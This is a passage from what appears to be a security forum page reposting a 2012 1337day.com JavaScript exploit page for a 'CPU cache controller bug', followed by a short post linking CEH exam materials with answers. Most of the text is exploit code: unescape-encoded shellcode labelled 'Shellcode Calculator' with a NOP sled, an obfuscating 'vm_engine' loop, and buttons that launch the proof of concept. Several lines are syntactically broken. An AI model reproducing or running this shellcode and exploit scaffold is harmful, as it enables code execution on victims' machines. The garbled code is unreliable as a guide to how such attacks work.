"%u771F%u0000%uD322%u0000%uED00%u0000%u6E3F%u0000%uD642%u0000%uEE00%u0000"+ "%u757F%u0000%uAD82%u0000%uEF00%u0000%u08FF%u0000%u2801%u0100%uF000%u0000"+ "%uF3FC%u0100%u37FF%u0100%uF100%u0000%u1201%u0000%u1A03%u0000%uF200%u0000"+ "%uD100%u0000%u5903%u0000%uF300%u0000%u5401%u0000%uC404%u0000%uF400%u0000"+ "%u4F07%u0000%uDB0A%u0000%uF500%u0000%u760F%u0000%uAE12%u0000%uF600%u0000"+ "%u3D1F%u0000%uD522%u0000%uF700%u0000%u003F%u0000%u1041%u0000%uF800%u0000"+ "%uFB7C%u0000%u1F7F%u0000%uF900%u0000%u0A01%u0000%u0203%u0000%uFA00%u0000"+ "%uF900%u0000%u1103%u0000%uFB00%u0000%u1C01%u0000%uEC04%u0000%uFC00%u0000"+ "%u0707%u0000%u0309%u0000%uFD00%u0000%uFE0C%u0000%u060F%u0000%uFE00%u0000"+ "%u0501%u0000%uFD04%u0000%uFF00%u0000%uF806%u0000%uF808%u0000%u0001%u0000"; unescape(evilcode); } /* // THREATED IMPLEMENTATION function init(){ document.write("<p>[!] Exploit Running</p><br>"); document.write("[+] Loading micro-program"); microcode_vm(); var a, id, handle; var size = 111; document.write("initializing XX thread..."); for (a=1; a < N_CORE; a++){ //code should be written for debug. } } */ function vm_engine() { var a, dw, f1, f2, f3, fn, f0 = -1, dt = 0; for({ microcode_vm(); f1; unescape = (p + ((dt++) % n)); f2 = (p + ((dt++) % n)); f3 = (p + ((dt++) % n)); // vm + scrambler + dynamic encoder + multi-pass obfuscator fn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0; // a few minutes to trigger this condition on 2.4 MHz PC if ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0) { // a sync problem. it would be better to use locks over here. // crash happens. crash is not shit. crash means code works. // so, should be really care about the addr and the content? // it works for Intel Core 2 Duo T5750. o_o 5 ~ 10 minutes of // it gives BSOD on Intel Atom N270 cpu o_o less than an hour f3 = test(result); f1 = unescape("%u9090%u9090") ^ f0 + // Shellcode Calculator unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+ "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); f2 = test ^ fn; document.write("<br><br>w00t! w00t! u g0t r00t ?!<br>"); } (p + (f3 % n)) = fn; f0 = fn; /* f0 = fn ^ dt */ ; } } function demo() { var n; document.write("HITB 2008 missing exploit :=) by Selena<br><br>"); document.write("micro-code is written by Selena<br>"); document.write("virtual machine is designed by Selena<br>"); document.write("virtual machine is designed by Selena<br>"); document.write("virtual machine has been rewritten by nezumi<br><br>"); document.write("exploit PoC rewritten by S4(uR4 for remote atack demo 2012<br><br>"); //setTimeout(9000); document.write("[!]<b> Exploit Running"); vm_engine(); //if (n == 0) { init_t();} ; //if(result != 0){ document.write("<br><b>[+] Done!"); //} } </script> <h1>CPU cache controller bug exploit Remote code exec mod</h1> <button onClick="ThreadProc_dbg(bug)";><b>• Check vuln</b> »</button> <button onClick="demo()";><b>PoC Run!</b> ?</button> </body> # 1337day.com [2012-07-13]
      • 1
      • Upvote
  20. Examenul CEH v5 si v7. Link v5: http://www.depotware-network.net/Partage/CEH/examen/cehv5.html Link v7: http://www.depotware-network.net/Partage/CEH/examen/cehv7.pdf (+ raspunsuri) Si ca sa nu mai deschid alt topic pun aici si materialele de la CEH v6 : http://art-exhibition.sustech.edu/lectures/CEH/
×
×
  • Create New...